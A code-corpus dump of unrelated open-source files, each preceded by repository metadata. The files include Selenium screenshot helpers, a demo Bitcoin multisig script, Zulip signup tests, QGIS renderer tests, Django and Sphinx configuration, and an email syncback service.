:param bool value: Cleanup on success flag
:return:
"""
self.options['cleanup_on_success'] = bool(value)
@property
def engine(self):
"""Return image processing engine
:
|
return:
"""
return import_from_string(self.engine_class)()
@property
def engine_class(self):
"""Return image processing engine name
:return:
:rtype: str
"""
return self.ENGINES.get(self.options.get('needle_engine', 'pil').lower(), DEFAULT_ENGINE)
@engine_class.setter
def engine_class(self, value):
"""S
|
et image processing engine name
:param str value: Image processing engine name (pil, imagemagick, perceptualdiff)
:return:
"""
assert value.lower() in self.ENGINES
self.options['needle_engine'] = value.lower()
def get_screenshot(self, element=None):
"""Returns screenshot image
:param WebElement element: Crop image to element (Optional)
:return:
"""
stream = IOClass(base64.b64decode(self.driver.get_screenshot_as_base64().encode('ascii')))
image = Image.open(stream).convert('RGB')
if isinstance(element, WebElement):
window_size = self._get_window_size()
image_size = image.size
# Get dimensions of element
dimensions = self._get_element_dimensions(element)
if not image_size == (dimensions['width'], dimensions['height']):
ratio = self._get_ratio(image_size, window_size)
return image.crop([point * ratio for point in self._get_element_rect(element)])
return image
def get_screenshot_as_image(self, element=None, exclude=None):
"""
:param WebElement element: Crop image to element (Optional)
:param list exclude: Elements to exclude
:return:
"""
image = self.get_screenshot(element)
# Mask elements in exclude if element is not included
if isinstance(exclude, (list, tuple)) and exclude and not element:
# Gather all elements to exclude
elements = [self._find_element(element) for element in exclude]
elements = [element for element in elements if element]
canvas = ImageDraw.Draw(image)
window_size = self._get_window_size()
image_size = image.size
ratio = self._get_ratio(image_size, window_size)
for ele in elements:
canvas.rectangle([point * ratio for point in self._get_element_rect(ele)],
fill=ImageColor.getrgb('black'))
del canvas
return image
def assert_screenshot(self, file_path, element_or_selector=None, threshold=0, exclude=None):
"""Fail if new fresh image is too dissimilar from the baseline image
.. note:: From needle
https://github.com/python-needle/needle/blob/master/needle/cases.py#L161
:param str file_path: File name for baseline image
:param element_or_selector: WebElement or tuple containing selector ex. ('id', 'mainPage')
:
|
codevan/codevan
|
BitcoinPlay/multisig_address.py
|
Python
|
apache-2.0
| 911
| 0.004391
|
#!/usr/bin/env/ python
'''
Title - Create multi-signature address
'''
# Import bitcoin
from bitcoin import *
my_private_key1
|
= random_key()
my_private_key2 = random_key()
my_private_key3 = random_key()
print("Private Key1: %s\n" % my_private_key1)
print("Private Key2: %s\n" % my_private_key2)
print("Private Key3: %s\n" % my_private_key3)
print('\n');
# Generate Public Key:
my_public_key1 = privtopub(my_privat
|
e_key1)
my_public_key2 = privtopub(my_private_key2)
my_public_key3 = privtopub(my_private_key3)
print("Public Key1: %s\n" % my_public_key1)
print("Public Key2: %s\n" % my_public_key2)
print("Public Key3: %s\n" % my_public_key3)
print('\n');
# Create Multi-Sig Address:
my_multi_sig = mk_multisig_script(my_public_key1, my_public_key2, my_public_key3, 2, 3)
my_multisig_address = scriptaddr(my_multi_sig)
print("Multi Signature Address %s\n" % my_multisig_address)
|
ThermoNuclearPanda/Project_Automail
|
Python Files/utilities.py
|
Python
|
mit
| 358
| 0.022346
|
"""
@Author: Kiran Gurajala & Alex Lee
@Project: P
|
roject Automail
@Version: 1.0
"""
# Required imports
import struct
# Utils
def pack(fmt, *args):
return struct.pa
|
ck('<' + fmt, *args)
def unpack(fmt, *args):
return struct.unpack('<' + fmt, *args)
def multichr(values):
return ''.join(map(chr, values))
def multiord(values):
return map(ord, values)
|
whardier/jabberhooky
|
jabberhooky/__init__.py
|
Python
|
mit
| 263
| 0.003802
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
|
JabberHooky"""
__name__ = "j
|
abberhooky"
__author__ = 'Shane R. Spencer'
__email__ = "shane@bogomip.com"
__license__ = 'MIT'
__copyright__ = '2012 Shane R. Spencer'
__version__ = '0.0.1'
__status__ = "Prototype"
|
kxgames/vecrec
|
docs/conf.py
|
Python
|
mit
| 857
| 0.007001
|
import sys, os
import vecrec
## General
project = u'vecrec'
copyright = u'2015, Kale Kundert'
version = vecrec.__version__
release = vecrec.__version__
master_doc = 'index'
source_suffix = '.rst'
templates_path = ['templates']
exclude_patterns = ['build']
default_role = 'any'
pygments_style = 'sphinx'
## Extensions
extensions = [
'autoclasstoc',
'sphinx.ext.aut
|
odoc',
'sphinx.ext.au
|
tosummary',
'sphinx.ext.viewcode',
'sphinx.ext.intersphinx',
'sphinx_rtd_theme',
]
intersphinx_mapping = { #
'pyglet': ('http://pyglet.readthedocs.io/en/latest', None),
'pygame': ('https://www.pygame.org/docs', None),
}
autosummary_generate = True
autodoc_default_options = {
'exclude-members': '__dict__,__weakref__,__module__',
}
html_theme = "sphinx_rtd_theme"
#html_static_path = ['static']
|
punchagan/zulip
|
zerver/tests/test_signup.py
|
Python
|
apache-2.0
| 225,136
| 0.002394
|
import datetime
import re
import time
import urllib
from typing import Any, Dict, List, Optional, Sequence
from unittest.mock import MagicMock, patch
from urllib.parse import urlencode
import orjson
from django.conf import settings
from django.contrib.auth.views import PasswordResetConfirmView
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ValidationError
from django.http import HttpResponse
from django.test import Client, override_settings
from django.urls import reverse
from django.utils.timezone import now as timezone_now
from confirmation import settings as confirmation_settings
from confirmation.models import (
Confirmation,
ConfirmationKeyException,
MultiuseInvite,
confirmation_url,
create_confirmation_link,
generate_key,
get_object_from_key,
one_click_unsubscribe_link,
)
from corporate.lib.stripe import get_latest_seat_count
from zerver.context_processors import common_context
from zerver.decorator import do_two_factor_login
from zerver.forms import HomepageForm, check_subdomain_available
from zerver.lib.actions import (
add_new_user_history,
change_user_is_active,
do_add_default_stream,
do_change_full_name,
do_change_realm_subdomain,
do_change_user_role,
do_create_default_stream_group,
do_create_realm,
do_create_user,
do_deactivate_realm,
do_deactivate_user,
do_get_user_invites,
do_invite_users,
do_set_realm_property,
get_default_streams_for_realm,
get_stream,
)
from zerver.lib.email_notifications import enqueue_welcome_emails, followup_day2_email_delay
from zerver.lib.initial_password import initial_password
from zerver.lib.mobile_auth_otp import (
ascii_to_hex,
hex_to_ascii,
is_valid_otp,
otp_decrypt_api_key,
otp_encrypt_api_key,
xor_hex_strings,
)
from zerver.lib.name_restrictions import is_disposable_domain
from zerver.lib.rate_limiter import add_ratelimit_rule, remove_ratelimit_rule
from zerver.lib.send_email import (
EmailNotDeliveredException,
FromAddress,
deliver_scheduled_emails,
send_future_email,
)
from zerver.lib.stream_subscription import get_stream_subscriptions_for_user
from zerver.lib.streams import create_stream_if_needed
from zerver.lib.subdomains import is_root_domain_available
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.test_helpers import (
avatar_disk_path,
cache_tries_captured,
find_key_by_email,
get_test_image_file,
load_subdomain_token,
message_stream_count,
most_recent_message,
most_recent_usermessage,
queries_captured,
reset_emails_in_zulip_realm,
)
from zerver.models import (
CustomProfileField,
CustomProfileFieldValue,
DefaultStream,
Message,
PreregistrationUser,
Realm,
RealmAuditLog,
Recipient,
ScheduledEmail,
Stream,
Subscription,
UserMessage,
UserProfile,
flush_per_request_caches,
get_realm,
get_system
|
_bot,
get_user,
get_user_by_delivery_email,
)
from zerver.views.auth import redirect_and_log_into_subdomain, start_two_factor_auth
from zerver.views.development.registration import confirmation_key
from zerver.views.invite import get_invitee_emails_set
from zproje
|
ct.backends import ExternalAuthDataDict, ExternalAuthResult
class RedirectAndLogIntoSubdomainTestCase(ZulipTestCase):
def test_data(self) -> None:
realm = get_realm("zulip")
user_profile = self.example_user("hamlet")
name = user_profile.full_name
email = user_profile.delivery_email
response = redirect_and_log_into_subdomain(ExternalAuthResult(user_profile=user_profile))
data = load_subdomain_token(response)
self.assertDictEqual(
data,
{"full_name": name, "email": email, "subdomain": realm.subdomain, "is_signup": False},
)
data_dict = ExternalAuthDataDict(is_signup=True, multiuse_object_key="key")
response = redirect_and_log_into_subdomain(
ExternalAuthResult(user_profile=user_profile, data_dict=data_dict)
)
data = load_subdomain_token(response)
self.assertDictEqual(
data,
{
"full_name": name,
"email": email,
"subdomain": realm.subdomain,
# the email has an account at the subdomain,
# so is_signup get overridden to False:
"is_signup": False,
"multiuse_object_key": "key",
},
)
data_dict = ExternalAuthDataDict(
email=self.nonreg_email("alice"),
full_name="Alice",
subdomain=realm.subdomain,
is_signup=True,
full_name_validated=True,
multiuse_object_key="key",
)
response = redirect_and_log_into_subdomain(ExternalAuthResult(data_dict=data_dict))
data = load_subdomain_token(response)
self.assertDictEqual(
data,
{
"full_name": "Alice",
"email": self.nonreg_email("alice"),
"full_name_validated": True,
"subdomain": realm.subdomain,
"is_signup": True,
"multiuse_object_key": "key",
},
)
class DeactivationNoticeTestCase(ZulipTestCase):
def test_redirection_for_deactivated_realm(self) -> None:
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
for url in ("/register/", "/login/"):
result = self.client_get(url)
self.assertEqual(result.status_code, 302)
self.assertIn("deactivated", result.url)
def test_redirection_for_active_realm(self) -> None:
for url in ("/register/", "/login/"):
result = self.client_get(url)
self.assertEqual(result.status_code, 200)
def test_deactivation_notice_when_realm_is_active(self) -> None:
result = self.client_get("/accounts/deactivated/")
self.assertEqual(result.status_code, 302)
self.assertIn("login", result.url)
def test_deactivation_notice_when_deactivated(self) -> None:
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.client_get("/accounts/deactivated/")
self.assertIn("Zulip Dev, has been deactivated.", result.content.decode())
self.assertNotIn("It has moved to", result.content.decode())
def test_deactivation_notice_when_deactivated_and_deactivated_redirect_is_set(self) -> None:
realm = get_realm("zulip")
realm.deactivated = True
realm.deactivated_redirect = "http://example.zulipchat.com"
realm.save(update_fields=["deactivated", "deactivated_redirect"])
result = self.client_get("/accounts/deactivated/")
self.assertIn(
'It has moved to <a href="http://example.zulipchat.com">http://example.zulipchat.com</a>.',
result.content.decode(),
)
def test_deactivation_notice_when_realm_subdomain_is_changed(self) -> None:
realm = get_realm("zulip")
do_change_realm_subdomain(realm, "new-subdomain-name", acting_user=None)
result = self.client_get("/accounts/deactivated/")
self.assertIn(
'It has moved to <a href="http://new-subdomain-name.testserver">http://new-subdomain-name.testserver</a>.',
result.content.decode(),
)
def test_deactivated_redirect_field_of_placeholder_realms_are_modified_on_changing_subdomain_multiple_times(
self,
) -> None:
realm = get_realm("zulip")
do_change_realm_subdomain(realm, "new-name-1", acting_user=None)
result = self.client_get("/accounts/deactivated/")
self.assertIn(
'It has moved to <a href="http://new-name-1.testserver">http://new-name-1.testserver</a>.',
result.content.decode(),
)
realm = get_realm("new-name-1")
do_change_realm_subdomain(realm, "new-name-2", acting_user=None)
result = sel
|
serefimov/billboards
|
billboards/billboards/wsgi.py
|
Python
|
mit
| 1,568
| 0.001276
|
"""
WSGI config for billboards project.
This module contains the
|
WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Dja
|
ngo WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
from os.path import abspath, dirname
from sys import path
SITE_ROOT = dirname(dirname(abspath(__file__)))
path.append(SITE_ROOT)
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "jajaja.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "billboards.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
ChantyTaguan/zds-site
|
zds/gallery/managers.py
|
Python
|
gpl-3.0
| 1,665
| 0.003003
|
from django.db import models
from django.db.models import OuterRef, Subquery, Count
from django.db.models.functions import Coalesce
class GalleryManager(models.Manager):
def annotated_gallery(self):
"""Annotate gallery with
- ``linked_content``, which contains the pk of the associated content if any ;
- ``image_count``, which contains the number of images.
:rtype: QuerySet
"""
from zds.tutorialv2.models.database i
|
mport PublishableContent
from zds.gallery.models import Image
linked_content = PublishableContent.objects.filter(gallery__pk=OuterRef("pk")).values("pk")
images = (
Image.objects.filter(gallery__pk=OuterRef("pk"))
.values("gallery")
.annotate(count=Count("pk"))
.values("count")
)
return self.annotate(linked_content=Subquery(linked_content)).annotate(
image_count=Coalesce(Subquery(i
|
mages), 0)
)
def galleries_of_user(self, user):
"""Get galleries of user, and annotate with an extra field ``user_mode`` (which contains R or W)
:param user: the user
:type user: zds.member.models.User
:rtype: QuerySet
"""
from zds.gallery.models import UserGallery
user_galleries = UserGallery.objects.filter(user=user).prefetch_related("gallery").values("gallery__pk")
user_mode = UserGallery.objects.filter(user=user, gallery__pk=OuterRef("pk"))
return (
self.annotated_gallery()
.filter(pk__in=user_galleries)
.annotate(user_mode=Subquery(user_mode.values("mode")))
)
|
rduivenvoorde/QGIS
|
tests/src/python/test_qgsrulebasedrenderer.py
|
Python
|
gpl-2.0
| 23,130
| 0.002335
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
test_qgsrulebasedrenderer.py
---------------------
Date : September 2015
Copyright : (C) 2015 by Matthias Kuhn
Email : matthias at opengis dot ch
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
From build dir, run: ctest -R PyQgsRulebasedRenderer -V
"""
__author__ = 'Matthias Kuhn'
__date__ = 'September 2015'
__copyright__ = '(C) 2015, Matthiasd Kuhn'
import qgis # NOQA
import os
from qgis.PyQt.QtCore import Qt, QSize
from qgis.PyQt.QtGui import QColor
from qgis.core import (QgsVectorLayer,
QgsMapSettings,
|
QgsProject,
QgsRectangle,
QgsMultiRenderChecker,
QgsRuleBasedRenderer,
QgsFillSymbol,
QgsMarkerSymbol,
QgsRendererCategory,
QgsCategorizedSymbolRenderer,
QgsGraduatedSymbolRenderer,
QgsRendererRange,
|
QgsRenderContext,
QgsSymbolLayer,
QgsSimpleMarkerSymbolLayer,
QgsProperty,
QgsFeature,
QgsGeometry,
QgsEmbeddedSymbolRenderer
)
from qgis.testing import start_app, unittest
from utilities import unitTestDataPath
# Convenience instances in case you may need them
# not used in this test
start_app()
TEST_DATA_DIR = unitTestDataPath()
class TestQgsRulebasedRenderer(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Super ugly hack to make sure python does not clean up our mapsetting objects
# this might lead to occasional crashes on travis
cls.mapsettings_archive = list()
def setUp(self):
myShpFile = os.path.join(TEST_DATA_DIR, 'rectangles.shp')
layer = QgsVectorLayer(myShpFile, 'Rectangles', 'ogr')
QgsProject.instance().addMapLayer(layer)
# Create rulebased style
sym1 = QgsFillSymbol.createSimple({'color': '#fdbf6f', 'outline_color': 'black'})
sym2 = QgsFillSymbol.createSimple({'color': '#71bd6c', 'outline_color': 'black'})
sym3 = QgsFillSymbol.createSimple({'color': '#1f78b4', 'outline_color': 'black'})
self.r1 = QgsRuleBasedRenderer.Rule(sym1, 0, 0, '"id" = 1')
self.r2 = QgsRuleBasedRenderer.Rule(sym2, 0, 0, '"id" = 2')
self.r3 = QgsRuleBasedRenderer.Rule(sym3, 0, 0, 'ELSE')
rootrule = QgsRuleBasedRenderer.Rule(None)
rootrule.appendChild(self.r1)
rootrule.appendChild(self.r2)
rootrule.appendChild(self.r3)
layer.setRenderer(QgsRuleBasedRenderer(rootrule))
self.mapsettings = QgsMapSettings()
self.mapsettings.setOutputSize(QSize(400, 400))
self.mapsettings.setOutputDpi(96)
self.mapsettings.setExtent(QgsRectangle(-163, 22, -70, 52))
rendered_layers = [layer]
self.mapsettings.setLayers(rendered_layers)
self.mapsettings_archive.append(self.mapsettings)
def testElse(self):
# Setup rendering check
renderchecker = QgsMultiRenderChecker()
renderchecker.setMapSettings(self.mapsettings)
renderchecker.setControlName('expected_rulebased_else')
self.assertTrue(renderchecker.runTest('rulebased_else'))
def testDisabledElse(self):
# Disable a rule and assert that it's hidden not rendered with else
self.r2.setActive(False)
renderchecker = QgsMultiRenderChecker()
renderchecker.setMapSettings(self.mapsettings)
renderchecker.setControlName('expected_rulebased_disabled_else')
self.assertTrue(renderchecker.runTest('rulebased_disabled_else'))
def testWillRenderFeature(self):
vl = self.mapsettings.layers()[0]
ft = vl.getFeature(0) # 'id' = 1
renderer = vl.renderer()
ctx = QgsRenderContext.fromMapSettings(self.mapsettings)
ctx.expressionContext().setFeature(ft)
renderer.rootRule().children()[0].setActive(False)
renderer.rootRule().children()[1].setActive(True)
renderer.rootRule().children()[2].setActive(True)
renderer.startRender(ctx, vl.fields()) # build mActiveChlidren
rendered = renderer.willRenderFeature(ft, ctx)
renderer.stopRender(ctx)
renderer.rootRule().children()[0].setActive(True)
self.assertFalse(rendered)
renderer.startRender(ctx, vl.fields()) # build mActiveChlidren
rendered = renderer.willRenderFeature(ft, ctx)
renderer.stopRender(ctx)
self.assertTrue(rendered)
def testWillRenderFeatureNestedElse(self):
vl = self.mapsettings.layers()[0]
ft = vl.getFeature(0) # 'id' = 1
ctx = QgsRenderContext.fromMapSettings(self.mapsettings)
ctx.expressionContext().setFeature(ft)
# Create rulebased style
sym1 = QgsFillSymbol.createSimple({'color': '#fdbf6f', 'outline_color': 'black'})
sym2 = QgsFillSymbol.createSimple({'color': '#71bd6c', 'outline_color': 'black'})
sym3 = QgsFillSymbol.createSimple({'color': '#1f78b4', 'outline_color': 'black'})
self.rx1 = QgsRuleBasedRenderer.Rule(sym1, 0, 0, '"id" = 1')
self.rx2 = QgsRuleBasedRenderer.Rule(sym2, 0, 0, '"id" = 2')
self.rx3 = QgsRuleBasedRenderer.Rule(sym3, 0, 0, 'ELSE')
self.rx3.appendChild(self.rx1)
rootrule = QgsRuleBasedRenderer.Rule(None)
rootrule.appendChild(self.rx2)
rootrule.appendChild(self.rx3)
vl.setRenderer(QgsRuleBasedRenderer(rootrule))
renderer = vl.renderer()
# Render with else rule and all activated
renderer.startRender(ctx, vl.fields())
self.assertTrue(renderer.willRenderFeature(ft, ctx))
renderer.stopRender(ctx)
# Render with else rule where else is deactivated
renderer.rootRule().children()[1].setActive(False)
renderer.startRender(ctx, vl.fields())
self.assertFalse(renderer.willRenderFeature(ft, ctx))
renderer.stopRender(ctx)
def testFeatureCount(self):
vl = self.mapsettings.layers()[0]
ft = vl.getFeature(2) # 'id' = 3 => ELSE
renderer = vl.renderer()
ctx = QgsRenderContext.fromMapSettings(self.mapsettings)
ctx.expressionContext().setFeature(ft)
counter = vl.countSymbolFeatures()
counter.waitForFinished()
renderer.startRender(ctx, vl.fields())
elseRule = None
for rule in renderer.rootRule().children():
if rule.filterExpression() == 'ELSE':
elseRule = rule
self.assertIsNotNone(elseRule)
cnt = counter.featureCount(elseRule.ruleKey())
self.assertEqual(cnt, 1)
def testRefineWithCategories(self):
# Test refining rule with categories (refs #10815)
# First, try with a field based category (id)
cats = []
cats.append(QgsRendererCategory(1, QgsMarkerSymbol(), "id 1"))
cats.append(QgsRendererCategory(2, QgsMarkerSymbol(), ''))
cats.append(QgsRendererCategory(None, QgsMarkerSymbol(), ''))
c = QgsCategorizedSymbolRenderer("id", cats)
QgsRuleBasedRenderer.refineRuleCategories(self.r2, c)
self.assertEqual(self.r2.children()[0].filterExpression(), '"id" = 1')
self.assertEqual(self.r2.children()[1].filterExpression(), '"id" = 2')
self.ass
|
klpdotorg/dubdubdub
|
apps/users/migrations/0020_auto_20140925_1129.py
|
Python
|
mit
| 905
| 0.00221
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('users', '0019_auto_20140909_1253'),
]
operations = [
migrations.AlterModelOptions(
name='donationitemcategory',
options={'verbose_name_plural': 'Donation item categories'},
),
migrations.AddField(
model_name='volunteeractivitytype',
name='color',
field=mo
|
dels.CharField(default='red', max_length=64, choices=[(b'red', b'Red'), (b'green', b'Green'), (b'pur
|
ple', b'Purple')]),
preserve_default=False,
),
migrations.AlterField(
model_name='donationitem',
name='requirement',
field=models.ForeignKey(related_name=b'items', to='users.DonationRequirement'),
),
]
|
huggingface/pytorch-transformers
|
utils/get_modified_files.py
|
Python
|
apache-2.0
| 1,484
| 0.003369
|
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0
|
(the "License");
# you may not use this file except in compliance with the License.
# You m
|
ay obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# this script reports modified .py files under the desired list of top-level sub-dirs passed as a list of arguments, e.g.:
# python ./utils/get_modified_files.py utils src tests examples
#
# it uses git to find the forking point and which files were modified - i.e. files not under git won't be considered
# since the output of this script is fed into Makefile commands it doesn't print a newline after the results
import re
import subprocess
import sys
fork_point_sha = subprocess.check_output("git merge-base master HEAD".split()).decode("utf-8")
modified_files = subprocess.check_output(f"git diff --name-only {fork_point_sha}".split()).decode("utf-8").split()
joined_dirs = "|".join(sys.argv[1:])
regex = re.compile(fr"^({joined_dirs}).*?\.py$")
relevant_modified_files = [x for x in modified_files if regex.match(x)]
print(" ".join(relevant_modified_files), end="")
|
JensTimmerman/radical.pilot
|
docs/architecture/api_draft/attributes.py
|
Python
|
mit
| 430
| 0.011628
|
# ------------------------------------------------------------------------------
#
class Attributes (object) :
# FIXME: add method sigs
# ------------------------------------------------------
|
--------------------
#
def __init__ (self, vals={}) :
raise Exception ("%s is not implemented" % self.__class__
|
.__name__)
# ------------------------------------------------------------------------------
#
|
hroumani/genericStorletStore
|
storletDeploy/sys_test_params.py
|
Python
|
apache-2.0
| 1,153
| 0
|
'''-------------------------------------------------------------------------
Copyright IBM Corp. 2015, 2015 All Rights Reserved
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
Limitations un
|
der the License.
-------------------------------------------------------------------------'''
'''
IMPORTANT: Make sure the variables AUTH_PI and KEYSTONE_IP point to the system
you are testing!!!
'''
'''------------------------------------------------------------------------'''
# Establishing Swift connection, user ID, etc
PROXY_PROTOCOL = 'HTTP'
AUTH_PROTOCOL = 'HTTP'
DEV_AUTH_IP = '9.26.19.179'
A
|
UTH_IP = DEV_AUTH_IP
PROXY_PORT = '80'
AUTH_PORT = '5000'
ACCOUNT = 'service'
USER_NAME = 'swift'
PASSWORD = 'passw0rd'
|
morelab/labman_ud
|
labman_ud/labman_setup/migrations/0004_labmandeploygeneralsettings_background_color.py
|
Python
|
gpl-3.0
| 494
| 0
|
# -*- coding: utf-8 -*-
from __
|
future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('labman_setup'
|
, '0003_googlesearchscript'),
]
operations = [
migrations.AddField(
model_name='labmandeploygeneralsettings',
name='background_color',
field=models.CharField(max_length=25, null=True, blank=True),
preserve_default=True,
),
]
|
fogbow/fogbow-dashboard
|
horizon/templatetags/horizon.py
|
Python
|
apache-2.0
| 4,349
| 0.00046
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from django import template
from django.utils.datastructures import SortedDict # noqa
from django.utils.encoding import force_unicode # noqa
from django.utils.translation import ugettext_lazy as _ # noqa
from horizon.base import Horizon # noqa
from horizon import conf
register = template.Library()
@register.filter
def has_permissions(user, component):
"""
Checks if the given user meets the permissions requirements for
the component.
"""
return user.has_perms(getattr(component, 'permissions', set()))
@register.filter
def has_permissions_on_list(components, user):
return [component for component
in components if has_permissions(user, component)]
@register.inclusion_tag('horizon/_nav_list.html', takes_context=True)
def horizon_main_nav(context):
""" Generates top-level dashboard navigation entries. """
if 'request' not in context:
return {}
current_dashboard = context['request'].horizon.get('dashboard', None)
dashboards = []
for dash in Horizon.get_dashboards():
if callable(dash.nav) and dash.nav(context):
dashboards.append(dash)
elif dash.nav:
dashboards.append(dash)
return {'components': dashboards,
'user': context['request'].user,
'current': current_dashboard,
'request': context['request'],
'showOnlyComponent' : _("Federation")}
@register.inclusion_tag('horizon/_subnav_list.html', takes_context=True)
def horizon_dashboard_nav(context):
""" Generates sub-navigation entries for the current dashboard. """
if 'request' not in context:
return {}
dashboard = context['request'].horizon['dashboard']
panel_groups = dashboard.get_panel_groups()
non_empty_groups = []
for group in panel_groups.values():
allowed_panels = []
for panel in group:
if callable(panel.nav) and panel.nav(context):
allowed_panels.append(panel)
elif not callable(panel.nav) and panel.nav:
allowed_panels.append(panel)
if allowed_panels:
non_empty_groups.append((group.name, allowed_panels))
return {'components': SortedDict(non_empty_groups),
'user': context['request'].user,
'current': context['request'].horizon['panel'].slug,
'request': co
|
ntext['request']}
@register.filter
def quota(val, units=None):
if val == float("inf"):
return _("No Limit")
elif units is not None:
return "%s %s %s" % (val, units, force_unicode(_("Available")))
else:
return "%s %s" % (val, force_unicode(_("Available")))
class JSTemplate
|
Node(template.Node):
""" Helper node for the ``jstemplate`` template tag. """
def __init__(self, nodelist):
self.nodelist = nodelist
def render(self, context, ):
output = self.nodelist.render(context)
output = output.replace('[[[', '{{{').replace(']]]', '}}}')
output = output.replace('[[', '{{').replace(']]', '}}')
output = output.replace('[%', '{%').replace('%]', '%}')
return output
@register.tag
def jstemplate(parser, token):
"""
Replaces ``[[[`` and ``]]]`` with ``{{{`` and ``}}}``,
``[[`` and ``]]`` with ``{{`` and ``}}`` and
``[%`` and ``%]`` with ``{%`` and ``%}`` to avoid conflicts
with Django's template engine when using any of the Mustache-based
templating libraries.
"""
nodelist = parser.parse(('endjstemplate',))
parser.delete_first_token()
return JSTemplateNode(nodelist)
@register.assignment_tag
def load_config():
return conf.HORIZON_CONFIG
|
rmasters/inbox
|
inbox/transactions/actions.py
|
Python
|
agpl-3.0
| 3,454
| 0
|
"""Monitor the transaction log for changes that should be synced back to the
account backend.
TODO(emfree):
* Track syncback failure/success state, and implement retries
(syncback actions may be lost if the service restarts while actions are
still pending).
* Add better logging.
"""
import gevent
from sqlalchemy import asc, func
from inbox.util.concurrency import retry_with_logging
from inbox.log import get_logger
from inbox.models.session import session_scope
from inbox.models import ActionLog, Namespace
from inbox.actions import (mark_read, mark_unread, archive, unarchive, star,
unstar, save_draft, delete_draft, mark_spam,
unmark_spam, mark_trash, unmark_trash, send_draft)
A
|
CTION_FUNCTION_MAP = {
'archive': archive,
'unarchive': unarchive,
'mark_read': mark_read,
'mark_unread': mark_unread,
'star': star,
'unstar': unstar,
'mark_spam': mark_spam,
'unmark_spam': unmark_spam,
'mark_trash': mark_trash,
'unmark_trash': unmark_trash,
'send_draft': send_draft,
'save_draft': save_draft,
'delete_draft': delete_draft
}
class SyncbackService(gevent.Greenlet):
"""Asynchronously consumes the action log and exe
|
cutes syncback actions."""
def __init__(self, poll_interval=1, chunk_size=22, max_pool_size=22):
self.log = get_logger()
self.worker_pool = gevent.pool.Pool(max_pool_size)
self.poll_interval = poll_interval
self.chunk_size = chunk_size
with session_scope() as db_session:
# Just start working from the head of the log.
# TODO(emfree): once we can do retry, persist a pointer into the
# transaction log and advance it only on syncback success.
self.minimum_id, = db_session.query(
func.max(ActionLog.id)).one()
if self.minimum_id is None:
self.minimum_id = -1
gevent.Greenlet.__init__(self)
def _process_log(self):
# TODO(emfree) handle the case that message/thread objects may have
# been deleted in the interim
with session_scope() as db_session:
query = db_session.query(ActionLog). \
filter(ActionLog.id > self.minimum_id). \
order_by(asc(ActionLog.id)).yield_per(self.chunk_size)
for log_entry in query:
self.minimum_id = log_entry.id
action_function = ACTION_FUNCTION_MAP[log_entry.action]
namespace = db_session.query(Namespace). \
get(log_entry.namespace_id)
self._execute_async_action(action_function,
namespace.account_id,
log_entry.record_id)
def _execute_async_action(self, func, *args):
self.log.info('Scheduling syncback action', func=func, args=args)
g = gevent.Greenlet(retry_with_logging, lambda: func(*args),
logger=self.log)
g.link_value(lambda _: self.log.info('Syncback action completed',
func=func, args=args))
self.worker_pool.start(g)
def _run_impl(self):
self.log.info('Starting action service')
while True:
self._process_log()
gevent.sleep(self.poll_interval)
def _run(self):
retry_with_logging(self._run_impl, self.log)
|
GoogleCloudPlatform/python-docs-samples
|
datastore/cloud-ndb/flask_app.py
|
Python
|
apache-2.0
| 1,175
| 0
|
# Copyright 2019 Google LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License a
|
t
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START ndb_flask]
